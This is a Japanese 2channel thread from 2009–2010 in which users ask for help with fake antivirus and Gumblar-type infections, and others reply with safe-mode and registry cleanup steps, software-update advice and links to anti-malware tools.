再起動したら、activate security toolといういれた覚えのない?
英語のセキュリティーソフトが立ちあがって
永遠ループします
AVGの日本語を入れてあるのに
なんでこの英語のソフトが常に立ちあがって来るのかわりません
AVGを立ち上げてスキャンボタンを押してもこのソフトが警告を出して
実行させません。
そしな何度か再起動していたら
画面が真っ黒になってしまいます
助けてください
再起動したら、activate security toolといういれた覚えのない?
英語のセキュリティーソフトが立ちあがって
永遠ループします
AVGの日本語を入れてあるのに
なんでこの英語のソフトが常に立ちあがって来るのかわりません
AVGを立ち上げてスキャンボタンを押してもこのソフトが警告を出して
実行させません。
そしな何度か再起動していたら
画面が真っ黒になってしまいます
助けてください
330 :名無しさん@お腹いっぱい。:2009/12/27(日) 06:17:31
331 :名無しさん@お腹いっぱい。:2009/12/27(日) 06:19:31
おおかた詐欺ソフトだろう
MBAM ttp://filehippo.com/download_malwarebytes_anti_malware/
SAS ttp://filehippo.com/download_superantispyware/
DrWeb CureIt! ttp://www.freedrweb.com/cureit/
試してみな
MBAM ttp://filehippo.com/download_malwarebytes_anti_malware/
SAS ttp://filehippo.com/download_superantispyware/
DrWeb CureIt! ttp://www.freedrweb.com/cureit/
試してみな
332 :名無しさん@お腹いっぱい。:2009/12/27(日) 06:31:51
>>330
マックらから進みません
F8を押して起動したら
継続とBIOSセットアップの項目が出ました
ここからできることを教えてください
そもそも>>329はなんのソフトなのか分らないので調べていたところ
DTの一番新しい配列にこのソフトらしきものがあったので
起動してこのセキュリティーソフトが立ちあがる前に
そのソフトの右クリックでそのソフトのプロパディを調べたところ
1325654といった数字のなんだかよくわからないファイルだったので
それをゴミ箱に捨て
再起動をかけたところ次は起動したら画面が真っ暗になります
これが現状です
マックらから進みません
F8を押して起動したら
継続とBIOSセットアップの項目が出ました
ここからできることを教えてください
そもそも>>329はなんのソフトなのか分らないので調べていたところ
DTの一番新しい配列にこのソフトらしきものがあったので
起動してこのセキュリティーソフトが立ちあがる前に
そのソフトの右クリックでそのソフトのプロパディを調べたところ
1325654といった数字のなんだかよくわからないファイルだったので
それをゴミ箱に捨て
再起動をかけたところ次は起動したら画面が真っ暗になります
これが現状です
333 :名無しさん@お腹いっぱい。:2009/12/27(日) 06:35:36
>>331
だと思うんです
こんな一大事にセキュリティーソフトらしい動きで検索して
なんか押すとVISAで購入見たいな登録画面が出てきます
こんな状態そんなことがあるなんておかしいとは思ったんです
で、試す前に画面が暗くなってそこから動きません
だと思うんです
こんな一大事にセキュリティーソフトらしい動きで検索して
なんか押すとVISAで購入見たいな登録画面が出てきます
こんな状態そんなことがあるなんておかしいとは思ったんです
で、試す前に画面が暗くなってそこから動きません
334 :名無しさん@お腹いっぱい。:2009/12/27(日) 06:47:59
とりあえずセーフモードに入ってゴミ箱から戻せば?
起動しないよりましだろう
起動しないよりましだろう
335 :名無しさん@お腹いっぱい。:2009/12/27(日) 06:59:02
336 :名無しさん@お腹いっぱい。:2009/12/27(日) 07:16:26
それBIOSちゃう?
継続してもう一回 F8
継続してもう一回 F8
337 :名無しさん@お腹いっぱい。:2009/12/27(日) 07:30:58
fujisu画面の下に
ESC自己診断画面
F12 起動眼乳
F2 BIOSセットアップ
トでます
F8押したまま起動できません
セーフモードさっきいけたんですが、、なんだ?
ESC自己診断画面
F12 起動眼乳
F2 BIOSセットアップ
トでます
F8押したまま起動できません
セーフモードさっきいけたんですが、、なんだ?
338 :名無しさん@お腹いっぱい。:2009/12/27(日) 07:42:51
339 :名無しさん@お腹いっぱい。:2009/12/27(日) 08:00:12
細かい復旧指示が必要ならアダ被でやってくれ
ttp://bbs.higaitaisaku.com/cbbs.cgi
ttp://bbs.higaitaisaku.com/cbbs.cgi
340 :名無しさん@お腹いっぱい。:2009/12/27(日) 20:35:41
最近のウィルスの検体手に入れたいんだけど
どこかありませんか
どこかありませんか
341 :名無しさん@お腹いっぱい。:2009/12/28(月) 17:16:53
342 :名無しさん@お腹いっぱい。:2009/12/30(水) 16:10:47
343 :名無しさん@お腹いっぱい。:2010/01/04(月) 02:20:48
質問ではないんだが、ノーパソ修理専門店のHPにアクセスしたら
SecurityToolやられたぞ。
いきなりJavaのインストーラ起動してやられたぞ。
とりあえず自分のPCの方は駆除して通報はしといたが。
疑問なんだが、なんで会社のHPが感染してるんだ?
どこから来るんだ?
SecurityToolやられたぞ。
いきなりJavaのインストーラ起動してやられたぞ。
とりあえず自分のPCの方は駆除して通報はしといたが。
疑問なんだが、なんで会社のHPが感染してるんだ?
どこから来るんだ?
344 :名無しさん@お腹いっぱい。:2010/01/04(月) 02:41:01
どこの会社?
GENOじゃないのか?
GENOじゃないのか?
345 :名無しさん@お腹いっぱい。:2010/01/04(月) 11:26:27
ウイルス関係には疎いんだが、今度光ケーブルの工事をして家にインターネット引くんだけど、ウイルスソフト(ウイルスバスター使おうと思ってる)って工事日までにパソコンに入れた方がいいの?
パソコンはもう用意してあって初期設定も一応済ませてあるんだけど、ウイルスソフトに関してはまだなにもしてなくて
それとも入れるのにはネット環境が必要?
パソコンはもう用意してあって初期設定も一応済ませてあるんだけど、ウイルスソフトに関してはまだなにもしてなくて
それとも入れるのにはネット環境が必要?
346 :名無しさん@お腹いっぱい。:2010/01/04(月) 12:12:32
>>343
サイトを更新しているPCでブラウジングして
/*GNU GPL*/ か /*CODE1*/のウイルスに感染した
いま流行のWeb改ざんだな
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
サイトを更新しているPCでブラウジングして
/*GNU GPL*/ か /*CODE1*/のウイルスに感染した
いま流行のWeb改ざんだな
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
347 :名無しさん@お腹いっぱい。:2010/01/04(月) 13:02:36
>>343
ヤフーの知恵袋に同様の質問があったかも。
ヤフーの知恵袋に同様の質問があったかも。
348 :名無しさん@お腹いっぱい。:2010/01/04(月) 19:13:38
349 :名無しさん@お腹いっぱい。:2010/01/04(月) 20:24:16
>>348
何がいいの?
何がいいの?
350 :名無しさん@お腹いっぱい。:2010/01/04(月) 20:55:34
無難なのはノートン
351 :名無しさん@お腹いっぱい。:2010/01/05(火) 00:12:29
以外で選べ
352 :名無しさん@お腹いっぱい。:2010/01/05(火) 08:29:07
モロゾフの公式サイトでトロイ絶賛配布中 2
http://tsushima.2ch.net/test/read.cgi/news/1262623225/
http://tsushima.2ch.net/test/read.cgi/news/1262623225/
353 :名無しさん@お腹いっぱい。:2010/01/06(水) 02:35:50
すいません、質問です。
小泉ウィルスというのが発見されたのですが・・・
このウィルスとはクリックしない限り感染しないのでしょうか?
また、感染している場合は何か自分で分かる現象がありますか?
あと、最近ダウンロードした、ウィルスバスター体験版を時々止めながら使っているのですが
感染している場合は、ウィルスバスターを止めていないときに何か反応を示すのでしょうか?
よろしくお願いします。
小泉ウィルスというのが発見されたのですが・・・
このウィルスとはクリックしない限り感染しないのでしょうか?
また、感染している場合は何か自分で分かる現象がありますか?
あと、最近ダウンロードした、ウィルスバスター体験版を時々止めながら使っているのですが
感染している場合は、ウィルスバスターを止めていないときに何か反応を示すのでしょうか?
よろしくお願いします。
354 : ◆fdAnbU5Z6U :2010/01/06(水) 08:17:41
鼻くそをよ、ホジホジする時の秘訣を伝授しようとおもう。内緒だ。ここだけの内緒だ。
爪を適度に伸ばすんあ。でよ、鼻の穴にインするわけ。爪先でかすめ取る。ゆっくりだ。
ゆっくりしろ、力を入れるな。力まずやれ、鼻んなか傷つくとそこから血が出る、
傷出来る、いたい、ばい菌入る、鼻腫れる、触るだけで痛い。これはな、俺の経験談だ。
腫れたら3日は痛い。そいうもんだ。いいか、ゆっくり、力まずな
かすめ取ったらよナイロンの袋をゴミ袋の代わりにしてだな、こねれ、ひたすらこねれ、
そすっと、固形物になてポロポロ落ちるわけ。後は爪で爪の中のを取ってまたこねて落としてハイ終わり。ティッシュあるなら、使えな。それが最速だわな
爪を適度に伸ばすんあ。でよ、鼻の穴にインするわけ。爪先でかすめ取る。ゆっくりだ。
ゆっくりしろ、力を入れるな。力まずやれ、鼻んなか傷つくとそこから血が出る、
傷出来る、いたい、ばい菌入る、鼻腫れる、触るだけで痛い。これはな、俺の経験談だ。
腫れたら3日は痛い。そいうもんだ。いいか、ゆっくり、力まずな
かすめ取ったらよナイロンの袋をゴミ袋の代わりにしてだな、こねれ、ひたすらこねれ、
そすっと、固形物になてポロポロ落ちるわけ。後は爪で爪の中のを取ってまたこねて落としてハイ終わり。ティッシュあるなら、使えな。それが最速だわな
355 :名無しさん@お腹いっぱい。:2010/01/06(水) 11:09:26
356 :名無しさん@お腹いっぱい。:2010/01/06(水) 19:59:38
オンラインスキャンしたら
WORM_SDBOT.GAV
っていうのが検出されて、削除してくれた。
これがどんなのかがわかんないんだけど、解る人いますか?
調べても全然わかんないし、解説してるサイトも専門用語でわかんないorz
WORM_SDBOT.GAV
っていうのが検出されて、削除してくれた。
これがどんなのかがわかんないんだけど、解る人いますか?
調べても全然わかんないし、解説してるサイトも専門用語でわかんないorz
357 :名無しさん@お腹いっぱい。:2010/01/08(金) 01:54:28
Cドライブのルートに意味のない長い文字列の名前のフォルダが作られてて、
そこにフォルダと同名のPC画面をプリントスクリーンしたbmpとjpgがあったんですが、これってウィルスがやらかしたんですかね?
ちなみにウィルスバスターは今現在何も反応していません。
そこにフォルダと同名のPC画面をプリントスクリーンしたbmpとjpgがあったんですが、これってウィルスがやらかしたんですかね?
ちなみにウィルスバスターは今現在何も反応していません。
358 :名無しさん@お腹いっぱい。:2010/01/10(日) 05:16:40
タコイカウイルスっての見てみたいんですけど
どうやったら入手できますか?
どうやったら入手できますか?
359 :名無しさん@お腹いっぱい。:2010/01/13(水) 13:09:15
360 :名無しさん@お腹いっぱい。:2010/01/14(木) 02:40:05
361 :名無しさん@お腹いっぱい。:2010/01/14(木) 09:45:04
ウィルスバスターw
362 :名無しさん@お腹いっぱい。:2010/01/14(木) 15:07:56
PCを起動したら、Adobe Flash Playerのインストールウィザードが表示されて
そこに書いてある文字が「Adobe Flash Player 縺ョ繧「繝・・繝・・繝医r縺泌茜逕ィ縺ァ縺阪∪縺吶・/font>」
と文字化けのようになっていたのですがこれはなにかのウィルスの影響なのでしょうか?
PC初心者なのでなにとぞご教授お願いします
そこに書いてある文字が「Adobe Flash Player 縺ョ繧「繝・・繝・・繝医r縺泌茜逕ィ縺ァ縺阪∪縺吶・/font>」
と文字化けのようになっていたのですがこれはなにかのウィルスの影響なのでしょうか?
PC初心者なのでなにとぞご教授お願いします
363 :名無しさん@お腹いっぱい。:2010/01/14(木) 16:51:53
新型GENOウイルス
ttp://www.virustotal.com/jp/analisis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259371503
うんこMSEは未対応
ttp://www.virustotal.com/jp/analisis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259371503
うんこMSEは未対応
364 :名無しさん@お腹いっぱい。:2010/01/14(木) 19:07:05
>>363
1ヵ月半も前の結果貼られても参考にならんのだが
1ヵ月半も前の結果貼られても参考にならんのだが
365 :名無しさん@お腹いっぱい。:2010/01/14(木) 19:18:06
>>363
検索で12月22日時点の結果を見つけた
http://www.virustotal.com/jp/analisis/eb8d63a5a4a2f97c1129caf0fe84ce651cc8d029cbfcad75ebdc5017793c6715-1261477560
この時点ではAvast、DrWeb、MSEあたりが未対応
検索で12月22日時点の結果を見つけた
http://www.virustotal.com/jp/analisis/eb8d63a5a4a2f97c1129caf0fe84ce651cc8d029cbfcad75ebdc5017793c6715-1261477560
この時点ではAvast、DrWeb、MSEあたりが未対応
366 :名無しさん@お腹いっぱい。:2010/01/15(金) 00:58:39
昔の動画ファイルを整理してたんだけど、
あるひとつのフォルダの中の動画だけ
全然関係ない音声ファイルに変わってしまってるんだけどこれ何?
すげー怖いんだけど。だれかヘルプ。noton先生は無反応。
あるひとつのフォルダの中の動画だけ
全然関係ない音声ファイルに変わってしまってるんだけどこれ何?
すげー怖いんだけど。だれかヘルプ。noton先生は無反応。
367 :名無しさん@お腹いっぱい。:2010/01/16(土) 09:58:57
test
368 :名無しさん@お腹いっぱい。:2010/01/17(日) 13:16:58
突然バイキンマンがでてきて、ウィルスばら撒くぞー、とか言って、
アンパンマンが出てきても負けちゃいます。バイキンマン強い。
そしてそのままフリーズ。強制終了で、再起動すると、またそれになる。
これ何のウィルスですか?また、別物ですか?検索しても良くわかりませんでした。
アンパンマンが出てきても負けちゃいます。バイキンマン強い。
そしてそのままフリーズ。強制終了で、再起動すると、またそれになる。
これ何のウィルスですか?また、別物ですか?検索しても良くわかりませんでした。
369 :名無しさん@お腹いっぱい。:2010/01/17(日) 15:21:17
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「UPDATEしたことない」
【使用セキュリティソフトとバージョン】 「使用していない」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
普通に正規のサイトを見ていたらいきなり「Security Tool」というものが起動した。
更に使っていたブラウザのFirefoxが強制的にアンインストールされたのか、消えて無くなりました。
ひとまずセーフモードで起動しなおして、「Security Tool」を削除。
ほかに探していたらスタートアッププログラムに「sysdyx32.exe」というのを見つけてパスを確認し元を削除。
そしてPCを通常モードで再起動すると、「プロダクトキーが無効です」といわれログイン出来なくなりました。
これってもう手遅れでしょうか?ちなみにセーフモードでならまだ動きます。
【Microsoft Update(MU)の状態】 「UPDATEしたことない」
【使用セキュリティソフトとバージョン】 「使用していない」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
普通に正規のサイトを見ていたらいきなり「Security Tool」というものが起動した。
更に使っていたブラウザのFirefoxが強制的にアンインストールされたのか、消えて無くなりました。
ひとまずセーフモードで起動しなおして、「Security Tool」を削除。
ほかに探していたらスタートアッププログラムに「sysdyx32.exe」というのを見つけてパスを確認し元を削除。
そしてPCを通常モードで再起動すると、「プロダクトキーが無効です」といわれログイン出来なくなりました。
これってもう手遅れでしょうか?ちなみにセーフモードでならまだ動きます。
370 :名無しさん@お腹いっぱい。:2010/01/17(日) 15:48:18
>>369
いわゆるガンブラー(8080系)だな
ダウンローダ・タイプのウイルスだから「Security Tool」も
これが呼び込んだものと思われる
ほかにもウイルスを呼び込んでるかもしれないのでクリーンインストール推奨
とりあえずAdobe Reader(Acrobat)、Microsoft Update、JRE(Java Runtime Environment)を
最新版に更新しないとまた感染するだろう
念のためAdobe Flash Playerの更新とInternet Explorerがゼロデイ中なので
IE8に変更するといいだろう
一応復旧できるかもしれないので下記を実行
復旧したらバックアップを取ってクリーンインストール
セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録を削除
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
をもう一度確認してあれば削除
いわゆるガンブラー(8080系)だな
ダウンローダ・タイプのウイルスだから「Security Tool」も
これが呼び込んだものと思われる
ほかにもウイルスを呼び込んでるかもしれないのでクリーンインストール推奨
とりあえずAdobe Reader(Acrobat)、Microsoft Update、JRE(Java Runtime Environment)を
最新版に更新しないとまた感染するだろう
念のためAdobe Flash Playerの更新とInternet Explorerがゼロデイ中なので
IE8に変更するといいだろう
一応復旧できるかもしれないので下記を実行
復旧したらバックアップを取ってクリーンインストール
セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録を削除
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
をもう一度確認してあれば削除
おっとVistaだったな
ということはレジストリやスタートアップのが場所が
違うだろうから適当に読み替えてくれ
ということはレジストリやスタートアップのが場所が
違うだろうから適当に読み替えてくれ
372 :名無しさん@お腹いっぱい。:2010/01/17(日) 16:47:54
>>371
おお・・・・・・復旧出来ました!TM6.tmpを削除したら動きました。
仰るとおりウィルスは他にもいるかもしれないので、
重要なデータのバックアップは取ったのでネットに繋ぎ、オンラインスキャンでウィルスがいないか調べてみようと思います。
その後アドバイスしてくださった通り、OSやらAdobeも最新版に更新しようと思います。
本当にありがとうございました。
おお・・・・・・復旧出来ました!TM6.tmpを削除したら動きました。
仰るとおりウィルスは他にもいるかもしれないので、
重要なデータのバックアップは取ったのでネットに繋ぎ、オンラインスキャンでウィルスがいないか調べてみようと思います。
その後アドバイスしてくださった通り、OSやらAdobeも最新版に更新しようと思います。
本当にありがとうございました。
373 :名無しさん@お腹いっぱい。:2010/01/17(日) 17:40:46
>>372
クリーンインストールのほうがいいと思うが強制は出来んか・・・
一点いい忘れていたが、FTP経由で自分のWebサイトを持っていたら
アカウントとパスワードを盗まれてウイルスの配布サイトにされてしまうので
ウイルスのない安全なPCからパスワードを変更しておくようにな
クリーンインストールのほうがいいと思うが強制は出来んか・・・
一点いい忘れていたが、FTP経由で自分のWebサイトを持っていたら
アカウントとパスワードを盗まれてウイルスの配布サイトにされてしまうので
ウイルスのない安全なPCからパスワードを変更しておくようにな
374 :名無しさん@お腹いっぱい。:2010/01/17(日) 19:26:26
>>373
トレンドマイクロでウィルスチェックしてみたのですがウィルスはもうありませんでした。
逆に不気味ですよね。クリーンインストールしたいのはやまやまなのですが、
学校で支給してもらったソフトを消すとまたインストールするのに料金が発生するらしいのです。
ですからお金が無い今はしばらくこのままでやってみます。
念のためカスペルスキー?とかいうメーカーでもやろうとしましたが出来ませんでした。
なのでavastという対策ソフトを入れてみようと思います。
とにかくいつPCが止まってもいいように小まめに、
重要なファイルのバックアップをとっておきます。
親切にありがとうございました。
トレンドマイクロでウィルスチェックしてみたのですがウィルスはもうありませんでした。
逆に不気味ですよね。クリーンインストールしたいのはやまやまなのですが、
学校で支給してもらったソフトを消すとまたインストールするのに料金が発生するらしいのです。
ですからお金が無い今はしばらくこのままでやってみます。
念のためカスペルスキー?とかいうメーカーでもやろうとしましたが出来ませんでした。
なのでavastという対策ソフトを入れてみようと思います。
とにかくいつPCが止まってもいいように小まめに、
重要なファイルのバックアップをとっておきます。
親切にありがとうございました。
375 :名無しさん@お腹いっぱい。:2010/01/17(日) 23:52:13
>>374
今インストールしているのに、再インストールに料金かかる
とか、あまり聞かないけど、なんのソフト?
あと、>>373 も書いてるように、アカウントとパスワード盗まれて
いたら、被害者のつもりが加害者になるから、気をつけて。
今インストールしているのに、再インストールに料金かかる
とか、あまり聞かないけど、なんのソフト?
あと、>>373 も書いてるように、アカウントとパスワード盗まれて
いたら、被害者のつもりが加害者になるから、気をつけて。
376 :名無しさん@お腹いっぱい。:2010/01/20(水) 18:41:18
すいません。初心者なので、わかるところだけ記入します。
【使用OS】 「Windows Vista」 手動でたまに
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更新のはずがはずされている。」
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「スキャンしたがウィルスが自動的に駆除されていた」
今回で、二度目なのですがガジェットが同じものがたくさん作成されてしまいました。
削除に結構、時間がかかるのでイライラしてます。
これってウィルスなんでしょうか?
【使用OS】 「Windows Vista」 手動でたまに
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更新のはずがはずされている。」
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「スキャンしたがウィルスが自動的に駆除されていた」
今回で、二度目なのですがガジェットが同じものがたくさん作成されてしまいました。
削除に結構、時間がかかるのでイライラしてます。
これってウィルスなんでしょうか?
377 :名無しさん@お腹いっぱい。:2010/01/20(水) 22:00:15
失礼します。
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更
新のはず」
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか】 「Win32:Walivun」 「JS_FAKEAV.DB」
お願いします。
avastで検出後、チェストに隔離はしましたが・・・・
以上の処理のみで大丈夫でしょうか?
FTP経由でWebサイトを持っています。
今後の危険/対処法について教えてください。
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更
新のはず」
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか】 「Win32:Walivun」 「JS_FAKEAV.DB」
お願いします。
avastで検出後、チェストに隔離はしましたが・・・・
以上の処理のみで大丈夫でしょうか?
FTP経由でWebサイトを持っています。
今後の危険/対処法について教えてください。
378 :名無しさん@お腹いっぱい。:2010/01/20(水) 23:18:35
ウィルススキャンしたら感染したファイルを削除したらoutlookが開けなくなったのですが、どうすればいいですか?
OS windows7 home premium
ワクチンソフト G Data
オブジェクト: Outlook2.pst
パス: C:\Users\****\AppData\Local\Microsoft\Outlook
ステータス: ファイルを隔離
ウイルス: Trojan.Downloader.Bredolab.BS (Engine A)
ファイル内を根こそぎ削除したのですが、根こそぎ削除したのがいけなかったのでしょうか?
OS windows7 home premium
ワクチンソフト G Data
オブジェクト: Outlook2.pst
パス: C:\Users\****\AppData\Local\Microsoft\Outlook
ステータス: ファイルを隔離
ウイルス: Trojan.Downloader.Bredolab.BS (Engine A)
ファイル内を根こそぎ削除したのですが、根こそぎ削除したのがいけなかったのでしょうか?
379 :名無しさん@お腹いっぱい。:2010/01/26(火) 00:29:02
★質問用テンプレ★
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「KIS2010(カスペルスキー)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新になっています」
【スパイウェア対策ソフト】 「Ad-Aware」「Spybot-S&D」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行なっています」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「コンピューターまたは個人情報を破損する可能性のある合法ソフトウェア
HiddenObject.Multi.Generic
c:\ :kospre1.exe」
ウイルスとおぼしきexeファイルを実行してしまって以来、ウイルススキャンの際に上記内容を
検出するようになり、スキャン自体も「C:\:kospre1.exe//exerb」から進まなくなってしまいます。
中断・再開の手順を踏む事で先に進み、他のドライブからはTrojan.Win32.Buzus.cvwjを検出・削除、
しかし上記のcドライブのファイルは駆除・削除・隔離といった機能を一切使用できません。
このファイルの元の場所を開いてみても、当該ファイル・フォルダが見当たりません。
パスを見る限り、隠しフォルダのようなものを作られているのでしょうか?
隠しファイルも表示する設定です。なお、シマンテックやトレンドマイクロ社のオンラインスキャン等も
試してみましたが、検出されておりません。対策等あればご教授願います。
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「KIS2010(カスペルスキー)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新になっています」
【スパイウェア対策ソフト】 「Ad-Aware」「Spybot-S&D」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行なっています」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「コンピューターまたは個人情報を破損する可能性のある合法ソフトウェア
HiddenObject.Multi.Generic
c:\ :kospre1.exe」
ウイルスとおぼしきexeファイルを実行してしまって以来、ウイルススキャンの際に上記内容を
検出するようになり、スキャン自体も「C:\:kospre1.exe//exerb」から進まなくなってしまいます。
中断・再開の手順を踏む事で先に進み、他のドライブからはTrojan.Win32.Buzus.cvwjを検出・削除、
しかし上記のcドライブのファイルは駆除・削除・隔離といった機能を一切使用できません。
このファイルの元の場所を開いてみても、当該ファイル・フォルダが見当たりません。
パスを見る限り、隠しフォルダのようなものを作られているのでしょうか?
隠しファイルも表示する設定です。なお、シマンテックやトレンドマイクロ社のオンラインスキャン等も
試してみましたが、検出されておりません。対策等あればご教授願います。
380 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:40:12
http://pc11.2ch.net/test/read.cgi/sec/1255956143/515
http://pc11.2ch.net/test/read.cgi/sec/1227543474/232
どこかで見たと思ったら、これと同じやつか。
http://pc11.2ch.net/test/read.cgi/sec/1227543474/232
どこかで見たと思ったら、これと同じやつか。
>380
そこで書かれてる方法を試したら消せたようです、ありがとうございます
しかしカスペユーザーで同じ状況の人は他にもいるんだなあ
どういう仕組みで見えなくしてるんだろう・・・
他社のセキュリティ使ってる場合はどうなるんだろうか
そこで書かれてる方法を試したら消せたようです、ありがとうございます
しかしカスペユーザーで同じ状況の人は他にもいるんだなあ
どういう仕組みで見えなくしてるんだろう・・・
他社のセキュリティ使ってる場合はどうなるんだろうか
382 :名無しさん@お腹いっぱい。:2010/01/27(水) 14:15:28
383 :名無しさん@お腹いっぱい。:2010/01/30(土) 07:39:31
【使用OS】 2000
【使用セキュリティソフト】 avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
シマンテックのオンラインスキャンで検査してみたところ
daemon toolsのuninst.exeがW32.SillyFDCであるとの結果が出ました。
手元のavastさんでは問題がなく、virustotalで調べても問題なさそうな結果(4/41)だったので
誤検出だろうと思ってそのままdaemonさんをアンインストールしてしまったのですが
今になって急速に心配になってきた次第です。
こういった誤検出はよくあることなんでしょうか?
なおアンインストールは普通にできてるみたいです。
(daemonを終了してからアンインストール実行しないと無反応だったのがちょっと気にかかるのですが)
【使用セキュリティソフト】 avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
シマンテックのオンラインスキャンで検査してみたところ
daemon toolsのuninst.exeがW32.SillyFDCであるとの結果が出ました。
手元のavastさんでは問題がなく、virustotalで調べても問題なさそうな結果(4/41)だったので
誤検出だろうと思ってそのままdaemonさんをアンインストールしてしまったのですが
今になって急速に心配になってきた次第です。
こういった誤検出はよくあることなんでしょうか?
なおアンインストールは普通にできてるみたいです。
(daemonを終了してからアンインストール実行しないと無反応だったのがちょっと気にかかるのですが)
384 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:47:14
【使用OS】 xp pro sp3
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフト】 avast→感染!駆除できず...現在kaspersky(駆除できず)
【Microsoft Update(MU)の状態】 「最新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
主な症状がフォルダオプションのすべてのファイルとフォルダを表示するで反映されなくなり隠しフォルダが見えなくなってしまって
怪しいなと思ってウイルス検索を掛けたら
"06.exe" "ce.exe" "oothsoru.exe"というのが各ドライブ直下で発見されました。
[すべてのファイルとフォルダを表示する]や上記のウイルス名でぐぐってもめぼしき情報が得られず、
セーフモードで立ち上げregeditでフォルダオプションで見えるようにする項目を0から1に変えてもすぐ戻ってしまいます。
この問題を経験された方や知恵のある方、よろしけばご教授ください。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフト】 avast→感染!駆除できず...現在kaspersky(駆除できず)
【Microsoft Update(MU)の状態】 「最新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
主な症状がフォルダオプションのすべてのファイルとフォルダを表示するで反映されなくなり隠しフォルダが見えなくなってしまって
怪しいなと思ってウイルス検索を掛けたら
"06.exe" "ce.exe" "oothsoru.exe"というのが各ドライブ直下で発見されました。
[すべてのファイルとフォルダを表示する]や上記のウイルス名でぐぐってもめぼしき情報が得られず、
セーフモードで立ち上げregeditでフォルダオプションで見えるようにする項目を0から1に変えてもすぐ戻ってしまいます。
この問題を経験された方や知恵のある方、よろしけばご教授ください。
385 :名無しさん@お腹いっぱい。:2010/01/31(日) 02:19:38
avast! ブートスキャンは試した?
386 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:19:04
【使用OS】 「WindowsXP Professional SP2」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「Avast4.8 Home Edition」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更新」
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\system32\apkruisi.dll」
PCを立ち上げてすぐ検出しました。
